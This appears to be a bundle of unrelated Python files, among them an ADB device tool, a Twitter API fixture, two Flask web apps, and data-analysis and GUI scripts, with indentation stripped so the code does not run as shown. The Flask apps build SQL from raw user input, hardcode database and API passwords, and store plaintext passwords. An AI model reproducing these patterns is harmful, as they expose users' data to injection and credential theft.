outfile.write('%s=%s\n' % (re.sub(r'\s+|\(|\)', '', key), re.sub(r'\s+', '_', value)))
outfile.write('\n')
if self.log_json is not None:
with open(self.log_json, 'w') as outfile:
json.dump(result, outfile, indent=4)
def get_output_dict(self):
"""
Can get the devices' information dict object after run().
"""
result = {}
unknown_serial_index = 1
for device_info in self.device_info_list:
if device_info['Serial'] is None:
device_serial = 'unknown_serial_' + str(unknown_serial_index)
unknown_serial_index += 1
else:
device_serial = device_info['Serial']
result[device_serial] = device_info
return result
def run(self):
"""
Entry point.
"""
self.devices = AdbWrapper.adb_devices()
is_no_color = self.no_color
if 'NO_COLOR' in os.environ:
try:
is_no_color = bool(util.strtobool(os.environ['NO_COLOR'].lower()))
except Exception as e:
logger.debug(e)
logger.error('Invalid NO_COLOR value [{0}].'.format(os.environ['NO_COLOR']))
if len(self.devices) == 0:
raise Exception('No device.')
elif len(self.devices) >= 1:
final_serial = AdbHelper.get_serial(self.serial)
if final_serial is None:
self.device_info_list = []
for device, state in self.devices.items():
print('Serial: {0} (State: {1})'.format(device, state))
if state == 'device':
device_info = self.get_device_info(serial=device)
self.print_device_info(device_info, no_color=is_no_color)
self.device_info_list.append(device_info)
else:
print('Skipped.\n')
self.device_info_list.append({'Serial': device, 'Skip': True})
else:
print('Serial: {0} (State: {1})'.format(final_serial, self.devices[final_serial]))
device_info = self.get_device_info(serial=final_serial)
self.device_info_list = [device_info]
self.print_device_info(device_info, no_color=is_no_color)
self._output_log()
def main():
try:
VersionChecker().cli().run()
except Exception as e:
logger.error(e)
exit(1)
if __name__ == "__main__":
main()
|
responseTwitter= {
"statuses": [
{
"created_at": "Thu Oct 01 14:18:34 +0000 2020",
"id": 1311671856303411202,
"id_str": "1311671856303411202",
"text": "I GOT THE SLEAZE IN MY TEETH, WHEN I MOVE I'M SLICK, NOTHING EVER STICKS TO ME... \n\nhttps://t.co/ESGts1XAgW\u2026 https://t.co/0sAULwV2kp",
"truncated": True,
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [],
"urls": [
{
"url": "https://t.co/ESGts1XAgW",
"expanded_url": "https://stevenwilson.lnk.to/ESSo/Youtube",
"display_url": "stevenwilson.lnk.to/ESSo/Youtube",
"indices": [
84,
107
]
},
{
"url": "https://t.co/0sAULwV2kp",
"expanded_url": "https://twitter.com/i/web/status/1311671856303411202",
"display_url": "twitter.com/i/web/status/1\u2026",
"indices": [
109,
132
]
}
]
},
"metadata": {
"result_type": "popular",
"iso_language_code": "en"
},
"source": "<a href=\"https://about.twitter.com/products/tweetdeck\" rel=\"nofollow\">TweetDeck</a>",
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 617155406,
"id_str": "617155406",
"name": "Steven Wilson",
"screen_name": "StevenWilsonHQ",
"location": "",
"description": "This is the official Twitter of musician, singer, songwriter and record producer Steven Wilson.",
"url": "https://t.co/G1ZbAQ0izd",
"entities": {
"url": {
"urls": [
{
"url": "https://t.co/G1ZbAQ0izd",
"expanded_url": "http://stevenwilsonhq.com",
"display_url": "stevenwilsonhq.com",
"indices": [
0,
23
]
}
]
},
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 87118,
"friends_count": 25,
"listed_count": 762,
"created_at": "Sun Jun 24 14:14:45 +0000 2012",
"favourites_count": 4,
"utc_offset": None,
"time_zone": None,
"geo_enabled": False,
"verified": True,
"statuses_count": 1801,
"lang": None,
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "0A0A0A",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_tile": False,
"profile_image_url": "http://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_banner_url": "https://pbs.twimg.com/profile_banners/617155406/1591372249",
"profile_link_color": "111111",
"profile_sidebar_border_color": "C0DEED",
"profile_sidebar_fill_color": "DDEEF6",
"profile_text_color": "333333",
"profile_use_background_image": True,
"has_extended_profile": False,
"default_profile": False,
"default_profile_image": False,
"following": None,
"follow_request_sent": None,
"notifications": None,
"translator_type": "none"
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"is_quote_status": False,
"retweet_count": 25,
"favorite_count": 212,
"favorited": False,
"retweeted": False,
"possibly_sensitive": False,
"lang": "en"
},
{
"created_at": "Tue Sep 29 10:58:37 +0000 2020",
"id": 1310896758814396416,
"id_str": "1310896758814396416",
"text": "EMINENT SLEAZE - https://t.co/DmhTJv1JBY\n\n\ud83d\udcf7 by Andrew Hobbs https://t.co/CWbkFg3sNu",
"truncated": False,
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [],
"urls": [
{
"url": "https://t.co/DmhTJv1JBY",
"expanded_url": "https://stevenwilson.lnk.to/ESSo",
"display_url": "stevenwilson.lnk.to/ESSo",
"indices": [
17,
40
]
}
],
"media": [
{
"id": 1310896723758325760,
"id_str": "1310896723758325760",
"indices": [
60,
83
],
"media_url": "http://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"media_url_https": "https://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"url": "https://t.co/CWbkFg3sNu",
"display_url": "pic.twitter.com/CWbkFg3sNu",
"expanded_url": "https://twitter.com/StevenWilsonHQ/status/1310896758814396416/photo/1",
"type": "photo",
"sizes": {
"thumb": {
"w": 150,
"h": 150,
"resize": "crop"
},
"large": {
"w": 2048,
"h": 2048,
"resize": "fit"
},
"small": {
"w": 680,
"h": 680,
"resize": "fit"
},
"medium": {
"w": 1200,
"h": 1200,
"resize": "fit"
}
}
}
]
},
"extended_entities": {
"media": [
{
"id": 1310896723758325760,
"id_str": "1310896723758325760",
"indices": [
60,
83
],
"media_url": "http://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"media_url_https": "https://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"url": "https://t.co/CWbkFg3sNu",
"display_url": "pic.twitter.com/CWbkFg3sNu",
"expanded_url": "https://twitter.com/StevenWilsonHQ/status/1310896758814396416/photo/1",
"type": "photo",
"sizes": {
"thumb": {
"w": 150,
"h": 150,
"resize": "crop"
},
"large": {
"w": 2048,
"h": 2048,
"resize": "fit"
},
"small": {
"w": 680,
"h": 680,
"resize": "fit"
},
"medium": {
"w": 1200,
"h": 1200,
"resize": "fit"
}
}
}
]
},
"metadata": {
"result_type": "popular",
"iso_language_code": "en"
},
"source": "<a href=\"https://about.twitter.com/products/tweetdeck\" rel=\"nofollow\">TweetDeck</a>",
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 617155406,
"id_str": "617155406",
"name": "Steven Wilson",
"screen_name": "StevenWilsonHQ",
"location": "",
"description": "This is the official Twitter of musician, singer, songwriter and record producer Steven Wilson.",
"url": "https://t.co/G1ZbAQ0izd",
"entities": {
"url": {
"urls": [
{
"url": "https://t.co/G1ZbAQ0izd",
"expanded_url": "http://stevenwilsonhq.com",
"display_url": "stevenwilsonhq.com",
"indices": [
0,
23
]
}
]
},
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 87118,
"friends_count": 25,
"listed_count": 762,
"created_at": "Sun Jun 24 14:14:45 +0000 2012",
"favourites_count": 4,
"utc_offset": None,
"time_zone": None,
"geo_enabled": False,
"verified": True,
"statuses_count": 1801,
"lang": None,
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "0A0A0A",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_tile": False,
"profile_image_url": "http://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_banner_url": "https://pbs.twimg.com/profile_banners/617155406/1591372249",
"profile_link_color": "111111",
"profile_sidebar_border_color": "C0DEED",
"profile_sidebar_fill_color": "DDEEF6",
"profile_text_color": "333333",
"profile_use_background_image": True,
"has_extended_profile": False,
"default_profile": False,
"default_profile_image": False,
"following": None,
"follow_request_sent": None,
"notifications": None,
"translator_type": "none"
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"is_quote_status": False,
"retweet_count": 19,
"favorite_count": 312,
"favorited": False,
"retweeted": False,
"possibly_sensitive": False,
"lang": "en"
}
],
"search_metadata": {
"completed_in": 0.023,
"max_id": 1311671856303411202,
"max_id_str": "1311671856303411202",
"next_results": "?max_id=1310896758814396415&q=from%3AStevenWilsonHQ&count=2&include_entities=1&result_type=mixed",
"query": "from%3AStevenWilsonHQ",
"refresh_url": "?since_id=1311671856303411202&q=from%3AStevenWilsonHQ&result_type=mixed&include_entities=1",
"count": 2,
"since_id": 0,
"since_id_str": "0"
}
}
response = responseTwitter["statuses"][0]["entities"]["urls"][1]
#print(response) For printing the response content
for key,values in response.items():
print(f"{key}:{values}")
|
from flask import Flask
from flask import request, Response
import MySQLdb
import urllib.request
import urllib.parse
import json
import time
import logging
import redis
redis_host = 'r-2ze42bfc8884f694.redis.rds.aliyuncs.com'
redis_port = 6379
redis_pwd = 'zhangrz@915'
mysql_host = 'rm-2zer7cl9103bs9k90125010.mysql.rds.aliyuncs.com'
mysql_port = 3306
mysql_user = 'control'
mysql_pwd = 'zhangrz@915'
mysql_database = 'lucky_user'
app_index = {
'wx53df963e29e4a7a9': '5ddf4191851dba79da4d290225484c9b'
}
app = Flask(__name__)
def get_access_token_api(appid, secret):
url = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=%s&secret=%s"%(appid, secret)
f = urllib.request.urlopen(url)
rsp = {}
data = None
try:
data = f.read()
except:
rsp['status'] = -1
rsp['errmsg'] = 'exception'
return rsp
if data is None:
rsp['status'] = -1
rsp['errmsg'] = 'rsp is none'
return rsp
js = None
try:
js = json.loads(data)
except:
rsp['status'] = -1
rsp['errmsg'] = 'json parse error'
return rsp
if 'errcode' in js:
rsp['status'] = -1
rsp['errmsg'] = js['errmsg']
return rsp
rsp['status'] = 0
rsp['access_token'] = js['access_token']
rsp['expire'] = js['expires_in']
return rsp
def get_ticket_api(token):
url = "https://api.weixin.qq.com/cgi-bin/ticket/getticket?access_token=%s&type=jsapi"%token
f = urllib.request.urlopen(url)
rsp = {}
data = None
try:
data = f.read()
except:
rsp['status'] = -1
rsp['errmsg'] = 'exception'
return rsp
if data is None:
rsp['status'] = -1
rsp['errmsg'] = 'rsp is none'
return rsp
js = None
try:
js = json.loads(data)
except:
rsp['status'] = -1
rsp['errmsg'] = 'json parse error'
return rsp
if 'errcode' not in js:
rsp['status'] = -1
rsp['errmsg'] = 'miss errcode'
return rsp
if js['errcode'] != 0:
rsp['status'] = -1
rsp['errmsg'] = js['errmsg']
rsp['status'] = 0
rsp['ticket'] = js['ticket']
rsp['expire'] = js['expires_in']
return rsp
@app.route("/")
def hello():
return "<h1 style='color:blue'>Hello There!</h1>"
@app.route("/get_access_token")
def get_access_token():
app_id = request.args.get("app_id")
if app_id is None:
return "{'msg':'app_id is miss'}"
r = redis.StrictRedis(host=redis_host, port=redis_port, password=redis_pwd)
data = r.get(app_id)
return data
@app.route("/get_ticket")
def get_ticket():
now = int(time.time())
app_id = request.args.get("app_id")
if app_id is None:
return "{'msg':'app_id is miss'}"
if app_id not in app_index:
return "{'msg':'can not find secret'}"
secret = app_index[app_id]
token_rsp = get_access_token_api(app_id, secret)
if 'status' not in token_rsp:
return "{'msg':'status not in rsp'}"
if token_rsp['status'] != 0:
return "{'msg':'gettoken status error:%s'}"%json.dumps(token_rsp)
access_token = token_rsp['access_token']
ticket_rsp = get_ticket_api(access_token)
if 'status' not in ticket_rsp:
return "{'msg':'status not in ticket_rsp'}"
if ticket_rsp['status'] != 0:
return "{'msg':'getticket status error:%s'}"%json.dumps(ticket_rsp)
data = {}
data['ticket'] = ticket_rsp['ticket']
data['expire_time'] = now + ticket_rsp['expire']
data_str = None
try:
data_str = json.dumps(data)
except:
return "{'msg':'json dump error'}"
return data_str
@app.route("/data_ack")
def data_ack():
now = int(time.time())
app_id = request.args.get("app_id")
if app_id is None:
return "{'msg':'app_id is miss'}"
if app_id not in app_index:
return "{'msg':'can not find secret'}"
count_name = request.args.get("name")
if count_name is None:
return "{'msg':'name is miss'}"
r = redis.StrictRedis(host=redis_host, port=redis_port, password=redis_pwd)
r.incr(count_name)
return "{'msg': 'ok'}"
word_index = [
'抗击新冠',
'复工复产',
'直播带货',
'小康生活',
'十三五收官',
'十九届五中全会',
'故宫600年',
'核心区控规',
'崇文争先',
'东城社工',
'紫金服务',
'对口帮扶',
'文明城区',
'垃圾分类',
'光盘行动',
'美丽院落',
'接诉即办',
'物业管理',
'留白增绿',
'王府井品牌节',
'网红打卡地',
'大戏东望',
'老字号新生活',
]
@app.route("/get_lucky_ticket", methods=['POST'])
def get_lucky_ticket():
info = {}
name = request.json.get('name', None)
key_word = request.json.get('key_word', None)
if name is None:
info['msg'] = 'name is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
if key_word is None:
info['msg'] = 'key_word is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
word_index_array = sorted(key_word.split(','))
key_words = []
for index in word_index_array:
index = int(index)
if index >0 and index < len(word_index):
key_words.append(word_index[int(index)])
user_key = "%s_%s"%(name, '_'.join(key_words))
print("user_key %s"%user_key)
lucky_index = hash(user_key)%5
info['lucky_index'] = lucky_index
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
@app.route('/upload_info', methods=['POST'])
def upload_info():
info = {}
name = request.json.get('name', None)
phone = request.json.get('phone', None)
addr = request.json.get('addr', None)
if name is None:
info['msg'] = 'name is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
if phone is None:
info['msg'] = 'phone is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
if addr is None:
info['msg'] = 'addr is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
try:
db = MySQLdb.connect(host=mysql_host, port=mysql_port, user=mysql_user, passwd=mysql_pwd, database=mysql_database, charset='utf8' )
cursor = db.cursor()
sql = "insert into `user` (name, phone, addr) VALUES('%s', '%s', '%s')"%(name, phone, addr)
print(sql)
ret = cursor.execute(sql)
print("execute ret:", ret)
db.commit()
db.close()
except Exception as e:
print(e)
info['msg'] = 'mysql error'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
info['msg'] = 'ok'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
@app.route('/get_lucky_user')
def get_lucky_user():
info = {}
offset = request.args.get("offset", '0')
count = request.args.get("count", '10')
if offset is None:
info['msg'] = 'offset is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
if count is None:
info['msg'] = 'count is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
try:
db = MySQLdb.connect(host=mysql_host, port=mysql_port, user=mysql_user, passwd=mysql_pwd, database=mysql_database, charset='utf8' )
cursor = db.cursor()
sql = "select name, phone, addr from user limit %s,%s"%(offset, count)
print(sql)
cursor.execute(sql)
results = cursor.fetchall()
info['data'] = []
for row in results:
user = row[0]
phone = row[1]
addr = row[2]
obj = {"name":user, "phone": phone, "addr": addr}
info['data'].append(obj)
db.close()
except Exception as e:
print(e)
info['msg'] = 'mysql error'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
if __name__ == '__main__':
app.run(debug=True, threaded=True)
application = app
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .easyaddress import *
from .easyaddress_ship import API as ShipAPI # TODO
__all__ = ['API', 'validate_email', 'validate_address']
|
import os
import sys
import tarfile
from datetime import datetime
from numpy import mean, sqrt, arange, array
import csv
##############################################################
# Use """ find folder_to_seatch -name "*.csv"| python parse_csv.py """ to run from command line
#initial RMS calculation
# Average absolute.deviation, and PSD at 1, 3, 6, and 10hz for each axis over one hour (or length of file if shorter than one hour) (eg x_abs, x_1hz, x_3hz, x_6hz, x_10hz)
#take root mean square of the x,y,z values to come up with rms_abs, rms_1, rms_3, rms_6, rms_10
def calculate_RMS():
for line in sys.stdin:
a_file = line.strip()
with open(a_file,'r') as csv_file:
x_abs = 0
x_1hz = 0
x_3hz = 0
x_6hz = 0
x_10hz = 0
y_abs = 0
y_1hz = 0
y_3hz = 0
y_6hz = 0
y_10hz = 0
z_abs = 0
z_1hz = 0
z_3hz = 0
z_6hz = 0
z_10hz = 0
length = 0
print a_file
csv_file.next() #skip the header
for line in csv_file:
length +=1
line = line.split(",")
x_abs += float(line[3])
x_1hz += float(line[6])
x_3hz += float(line[7])
x_6hz += float(line[8])
x_10hz += float(line[9])
y_abs += float(line[11])
y_1hz += float(line[14])
y_3hz += float(line[15])
y_6hz += float(line[16])
y_10hz += float(line[17])
z_abs += float(line[19])
z_1hz += float(line[22])
z_3hz += float(line[23])
z_6hz += float(line[24])
z_10hz += float(line[25])
if length > 600:
x_abs_avg = (x_abs/length)
x_1hz_avg = (x_1hz/length)
x_3hz_avg = (x_3hz/length)
x_6hz_avg = (x_6hz/length)
x_10hz_avg = (x_10hz/length)
y_abs_avg = (y_abs/length)
y_1hz_avg = (y_1hz/length)
y_3hz_avg = (y_3hz/length)
y_6hz_avg = (y_6hz/length)
y_10hz_avg = (y_10hz/length)
z_abs_avg = (z_abs/length)
z_1hz_avg = (z_1hz/length)
z_3hz_avg = (z_3hz/length)
z_6hz_avg = (z_6hz/length)
z_10hz_avg = (z_10hz/length)
# Calculate RMS for 5 dimensions
total_abs_avg = array([x_abs_avg, y_abs_avg, z_abs_avg])
rms_abs = sqrt(mean(total_abs_avg**2))
print "rms abs",rms_abs
total_1hz_avg = array([x_1hz_avg, y_1hz_avg, z_1hz_avg])
rms_1hz = sqrt(mean(total_1hz_avg**2))
print "rms 1hz",rms_1hz
total_3hz_avg = array([x_3hz_avg, y_3hz_avg, z_3hz_avg])
rms_3hz = sqrt(mean(total_3hz_avg**2))
print "rms 3hz",rms_3hz
total_6hz_avg = array([x_6hz_avg, y_6hz_avg, z_6hz_avg])
rms_6hz = sqrt(mean(total_6hz_avg**2))
print "rms 6hz",rms_6hz
total_10hz_avg = array([x_10hz_avg, y_10hz_avg, z_10hz_avg])
rms_10hz = sqrt(mean(total_10hz_avg**2))
print "rms 10hz",rms_10hz
label_id = 1
# append data to master_hourly.CSV
### CHANGE SO IT TAKES THE FILENAME AND LABEL ID OF CONTROL OR PARKINSONS
filename = "test_parkinsons_master_hourly.csv"
with open(filename, 'ab') as csvfile:
linewriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
linewriter.writerow([rms_abs, rms_1hz, rms_3hz, rms_6hz, rms_10hz, label_id,a_file])
calculate_RMS()
|
from django.contrib import admin
from .models import Order, OrderProduct
from user.models import User
from product.models import Product
# Register your models here.
class OrderAdmin(admin.ModelAdmin):
list_display = ('username',
'total_price', 'ordered_date',)
@admin.register(OrderProduct)
class OrderProductAdmin(admin.ModelAdmin):
list_display = ['order', 'product', 'quantity']
list_display_links = ['order', 'product']
admin.site.register(Order, OrderAdmin)
|
#!/usr/bin/env python
def help():
HELP_TEXT = """
#############################################################################
# MergeReplicateData.py
#
# Takes an SGA rawdata file as input and determines how many replicates there
# are for each query. It then spits the data back out renaming replicates to
# split them up. Explore 2,3,4,5,6. In fact, we might as well explore all
# the possibilties within this framework. This scrip
#
# Author: Benjamin VanderSluis (bvander@cs.umn.edu)
# Revision: May 25, 2012
#
# USAGE:
# MergeReplicateData.py split_param ReplicateList.txt BatchList.txt BigDataFile[.gz]
#
# INPUTS:
# ReplicateList head's up so we know which queries to grab
# BatchList mapping of query_setid -> batch
# BigDataFile contains all of the source data
#
# OUTPUTS: output1 output2
# Each run splits the replicate set into two complementary groups,
# then writes one groups (and accompanying batch) to output1 and
# the other to output2
#
#############################################################################
"""
print HELP_TEXT
return
################ MAIN FUNCTION
# imports and constants
import sys
import os
import fileinput
## Step 0: argument parsing and existence checks and help
if sys.argv.count('-h') + sys.argv.count('-help') + sys.argv.count('--help') > 0:
help()
exit()
if len(sys.argv) < 4:
print 'too few arguments (try "-h" for help)'
exit()
split_param = sys.argv[1] # ex 1,2,4 -> [1,2,4] [3,5,6,7]
replicate_file = sys.argv[2]
batch_file = sys.argv[3]
big_data_file = sys.argv[4]
# Now ensure that these all exist and we're allowed to write the output
# if we fail because of this, we want to fail before doing a lot of work
if not os.path.exists(replicate_file):
print 'replicate_file "' + replicate_file + '" does not exist'
exit()
if not os.path.exists(batch_file):
print 'batch_file "' + batch_file + '" does not exist'
exit()
if not os.path.exists(big_data_file):
print 'big_data_file "' + big_data_file + '" does not exist'
exit()
## Step 1: Read in our our list of queries and the number of replicates to expect
# I'm assumming that replicates are never in the same batch
replicate_queries = {} # query -> num_setids
replicate_fid = open(replicate_file, 'r')
replicate_fid.readline() # header line
for line in replicate_fid:
line = line.strip().split('\t')
#if int(line[3]) >= 5:
if int(line[3]) >= 6:
if int(line[1]) + int(line[2]) < 2:
replicate_queries[line[0]] = line[3]
else:
sys.stderr.write("problem with query: "+line[0]+"\n")
## Step 2: Hash the batch mapping file
keep_batches = set()
query_setids = {}
batch_fid = open(batch_file, 'r')
for line in batch_fid:
line = line.strip().split('\t')
# add this set to the list for this query
query = '_'.join(line[0].split('_')[:-1])
qset = line[0].split('_')[-1]
if query not in query_setids:
query_setids[query] = set()
query_setids[query].add(qset)
if query in replicate_queries:
keep_batches.add(line[1])
## Step 3: For each query, split the set ids into two groups
group1 = [int(x)-1 for x in split_param.split(',')]
size1 = len(group1)
size2 = {}
setA = {}
for query in replicate_queries:
setA[query] = [list(query_setids[query])[x] for x in group1]
size2[query] = len(query_setids[query]) - size1
## Step 4: Iterate through the scorefile
# keep replicate queries, renameing them
# keep anything in keep_batches
# Result can be appended to a short set.
if big_data_file[-3:] == '.gz':
big_data_fid = fileinput.hook_compressed(big_data_file, 'r')
else:
big_data_fid = open(big_data_file, 'r')
for line in big_data_fid:
line = line.strip().split('\t')
if line[0] in replicate_queries:
if line[3] in setA[line[0]]:
line[0] = line[0]+'_A'+str(size1)
else:
line[0] = line[0]+'_B'+str(size2[line[0]])
print('\t'.join(line))
#elif line[5] in keep_batches:
#print('\t'.join(line))
|
# !/usr/bin/python
# coding:utf-8
from wx import *
import net_UI2
import net_tools
class CalFrame(net_UI2.MyFrame2):
def __init__(self, parent):
net_UI2.MyFrame2.__init__(self,parent)
def Calnet(self, event):
'''
计算网络地址
:param event:
:return:
'''
ip = self.m_textCtrl1.GetValue() # 获取ip
mask_bit = str(self.m_choice2.GetCurrentSelection()) # 获取掩码位
# print mask_bit
host_num = net_tools.host_num(mask_bit) #可用主机数
self.m_textCtrl2.SetValue(str(host_num))
net = net_tools.networkAddr(ip,mask_bit) #网络地址
# print net
self.m_textCtrl4.SetValue(str(net))
netmask = net_tools.netmask(ip, mask_bit) #掩码
self.m_textCtrl3.SetValue(str(netmask))
firstAddr = net_tools.firstAvailAddr(ip, mask_bit)
self.m_textCtrl6.SetValue(str(firstAddr))
# lastAddr = net_tools.lastAvailAddr(ip, mask_bit)
# self.m_textCtrl10.SetValue(str(lastAddr))
broadcast = net_tools.broadcast(ip, mask_bit)
self.m_textCtrl5.SetValue(str(broadcast))
return ip,mask_bit,net,netmask,firstAddr,broadcast
def subnet_exchange(self,event):
'''
子网掩码转换
255.255.255.0————————>24
'''
netmask1 = self.m_textCtrl10.GetValue()
bits_sum = net_tools.exchange_mask(netmask1)
self.m_textCtrl11.SetValue(bits_sum)
def bits_exchange(self, event):
bits = self.m_textCtrl12.GetValue()
lists = net_tools.exchange_bit(bits)
try:
netmask = lists[0]
netmask_hex = lists[1]
except Exception:
netmask = lists[0]
netmask_hex= lists[0]
self.m_textCtrl14.SetValue(netmask)
self.m_textCtrl15.SetValue(netmask_hex)
def ip_exchange(self,event):
ip = self.m_textCtrl7.GetValue()
lists = net_tools.exchange_ip(ip)
try:
ip_str = lists[0]
ip_hex = lists[1]
except Exception:
ip_str = lists[0]
ip_hex = lists[0]
self.m_textCtrl8.SetValue(ip_str)
self.m_textCtrl9.SetValue(ip_hex)
def get(self,event):
ip = self.m_textCtrl2.GetValue() # 获取ip
mask_bit = self.m_textCtrl3.GetValue() # 获取掩码位
def get_list(self, event):
ip, mask_bit, net, netmask, firstAddr, broadcast = self.Calnet(event)
ip_data = '输入的ip为:{0}'.format(ip)
mask_bit_data = '输入的掩码位:{0}'.format(str(mask_bit))
net_data = '网络地址为:{0}'.format(str(net))
netmask_data = '掩码:{0}'.format(str(netmask))
firstAddr_data = '第一个可用地址:{0}'.format(str(firstAddr))
broadcast_data = '广播地址:{0}'.format(str(broadcast))
l = net_tools.subnet_ip(ip, mask_bit)
try:
with open('/home/xujn/桌面/net.txt', 'w') as f:
f.write("网络和IP转换器\n")
f.write(str(ip_data))
f.write('\n')
f.write(mask_bit_data)
f.write('\n')
f.write(net_data)
f.write('\n')
f.write(netmask_data)
f.write('\n')
f.write(firstAddr_data)
f.write('\n')
f.write(broadcast_data)
f.write('\n')
f.write('网络地址列表')
f.write('\n')
for i in l:
f.write(str(i))
f.write('\n')
f.write("子网掩码转换器\n")
f.close()
except Exception:
dlg = wx.MessageDialog(None, u"导出失败", u"错误", wx.YES_NO | wx.ICON_QUESTION)
if dlg.ShowModal() == wx.ID_YES:
# self.Close(True)
dlg.Destroy()
def get_host(self,event):
hname = net_tools.get_ip_hostname()[0]
mac = net_tools.get_mac_address()
ip_mac = str(hname+":"+mac)
self.m_textCtrl151.SetValue(ip_mac)
app1 = wx.App()
frame = CalFrame(None)
frame.Show()
# 主循环
app1.MainLoop()
|
from setuptools import setup
setup(
name="mywhopackage",
install_requires=["django==1.0",],
extras_require={"test": ["pytest==2.0",], "docs": ["Sphinx==1.0",],},
)
|
from flask import Flask, request, redirect, render_template, session
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://Blogz:Khr0no$1@localhost:8889/Blogz'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
app.secret_key = 'dgfdg5v65fj51g621g6'
class Users(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True)
password = db.Column(db.String(20))
blogs = db.relationship('Bloggz', backref='owner')
def __init__(self, username, password):
self.username = username
self.password = password
class Bloggz(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(75))
content = db.Column(db.String(500))
owner_id = db.Column(db.Integer, db.ForeignKey('users.id'))
def __init__(self, title, content, owner):
self.title = title
self.content = content
self.owner = owner
@app.before_request
def require_login():
not_allowed = ['add_page']
if 'username' not in session and request.endpoint in not_allowed:
return redirect('/login')
@app.route('/logout', methods=['POST', 'GET'])
def logout():
del session['username']
return redirect('/')
@app.route('/ind_blog', methods=['GET'])
def blog():
id = request.args['id']
post = Bloggz.query.filter_by(id=id).first()
return render_template('/ind_blog.html', post=post)
@app.route('/single_user', methods=['GET'])
def user_page():
id = request.args['id']
posts = (reversed(Bloggz.query.filter_by(id=id).all()))
return render_template('singleUser.html', id=id, posts=posts)
@app.route('/blog_submit', methods=['POST', 'GET'])
def blog_submit():
owner = Users.query.filter_by(username=session['username']).first()
title = ''
content = ''
valid=True
title_error=''
content_error=''
if request.method == 'POST':
title = request.form['blog-title']
content = request.form['blog-content']
if title=='':
title_error="""Don't you want to title your Blog post?"""
valid=False
if content=='':
content_error="""Where is your blog post? I don't see it anywhere!"""
valid=False
if valid is False:
return render_template('addnew.html', title_error=title_error, content_error=content_error)
blog = Bloggz(title, content, owner)
db.session.add(blog)
db.session.commit()
curr_id = str(blog.id)
return redirect('/ind_blog?id='+curr_id)
@app.route('/add_new', methods=['POST', 'GET'])
def add_page():
return render_template('/addnew.html')
@app.route("/log_val", methods=['GET', 'POST'])
def login_validation():
username = ''
password = ''
username_error=''
password_error=''
valid=True
if request.method == 'POST':
username = request.form['user-name']
password = request.form['password']
user = Users.query.filter_by(username=username).first()
if user and user.password == password:
session['username'] = username
return redirect('/')
else:
return '<h1>ERROR!!</h1>'
@app.route('/login', methods=['POST', 'GET'])
def login():
return render_template('/login.html')
@app.route("/reg_val", methods=['GET', 'POST'])
def register_validation():
username = ''
password = ''
password2 = ''
valid=True
username_error=''
password_error=''
password2_error=''
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
password2 = request.form['password2']
existing_user = Users.query.filter_by(username=username).first()
if username=='':
username_error='Select a username'
valid=False
if len(password) >20 or len(password) <3:
password_error='Password must be between 3 and 20 characters'
valid=False
if password2!=password or password2=='':
password2_error='Password does not match'
valid=False
if valid is False:
return render_template('signup.html', username_error=username_error, password_error=password_error, password2_error=password2_error)
if not existing_user:
signup = Users(username, password)
db.session.add(signup)
db.session.commit()
session['username'] = username
return redirect('/')
@app.route('/register', methods=['POST', 'GET'])
def register():
return render_template('/signup.html')
@app.route('/posts', methods=['POST', 'GET'])
def posts():
posts = (reversed(Bloggz.query.all()))
return render_template('blog.html', posts=posts)
@app.route('/', methods=['POST', 'GET'])
def index():
users = Users.query.all()
return render_template('index.html', users=users)
if __name__ == '__main__':
app.run() |
import sys
import getopt
import string
from itertools import product
EXCEPTION_COLOR = '\033[91m'
END_COLOR = '\x1b[0m'
